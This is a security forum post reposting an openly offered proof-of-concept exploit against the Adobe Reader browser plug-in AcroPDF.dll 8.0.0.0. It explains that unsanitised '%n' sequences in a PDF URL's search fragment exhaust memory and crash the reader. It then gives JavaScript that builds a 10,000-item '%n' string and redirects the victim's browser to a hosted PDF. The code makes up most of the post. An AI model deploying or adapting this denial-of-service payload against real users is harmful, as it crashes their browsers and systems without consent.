‹‹ 上一主题 | 下一主题 ››
发新话题
打印

Adobe Reader plug-in AcroPDF.dll 8.0.0.0 Resource Consumption

pub!1c

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3926 
精华
128 
积分
209876 
阅读权限
200 
性别
男 
在线时间
1109 小时 
注册时间
2007-10-23 
最后登录
2008-9-7 

资料收集奖 运营支持奖

楼主 发表于 2007-3-8 23:29  只看该作者

Adobe Reader plug-in AcroPDF.dll 8.0.0.0 Resource Consumption

复制内容到剪贴板
代码:
<!--------------------------------------------------------------------------------
Adobe PDF Reader plug-in AcroPDF.dll ver. 8.0.0.0 Resource Consumption
author: shinnai
mail: shinnai[at]autistici[dot]org
site: [url]http://www.shinnai.altervista.org[/url]

Well, Adobe guys do a good job after the publication of a variety of
bug in AcroPDF.dll, one for all

From Secunia:
"Input passed to a hosted PDF file is not properly sanitised by the
browser plug-in before being returned to users. This can be exploited
to execute arbitrary script code in a user&#39;s browser session in context
of an affected site."

So now the dll is able to understand when you&#39;re trying to insert something
wrong prompting you with "One or more of the query terms are too long."
and that&#39;s a good thing but... I thought "can this dll sanitise chars like
%n"
Well the answer is: no.

Unfortunately (sure depends by the point of view) Internet Explorer is
not useful for a test &#39;cause a limited number of chars (only 2083) is
admitted
in the address bar, so we need to use browser like Firefox and stuff like
that.
When you browse to a hosted pdf file like this
[url]http://somesite/poc.pdf#search=%n%n%n...[/url] x 10000 (or much more if you like)
the browse will stop to answer until the process AcroRd32.exe crashes,
the CPU usage is about 50-60% and the paging file usage grow until
it&#39;s full and you have the message "Insufficient virtual memory..."
Here&#39;s a proof of concept, for online demonstration see:
[url]http://www.shinnai.altervista.org/adobe.html[/url]

txt version here: [url]http://www.shinnai.altervista.org/txt/adobe.txt[/url]
-------------------------------------------------------------------------------->

<script language="javascript">
var browserName=navigator.appName;

if (browserName=="Netscape")
{var f = ""
var c = ""
for (var i = 0; i <= 10000; i++) {
  var f = f + "%n";
}
document.location = "http://www.shinnai.altervista.org/pucca.pdf#search=" +
(f)
}
else if (browserName==&#39;Opera&#39;)
{var f = ""
var c = ""
for (var i = 0; i <= 10000; i++) {
  var f = f + "%n";
}
document.location = "http://www.shinnai.altervista.org/pucca.pdf#search=" +
(f)
}
else if (browserName==&#39;Microsoft Internet Explorer&#39;)
{
alert("This exploit doesn&#39;t work with IE. You need to use Firefox and stuff
like that.");
document.location="http://www.shinnai.altervista.org";
}
else
{
alert("Mmm... I don&#39;t know what are you browsing with here, so no martini no
party.");
}
</script>

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题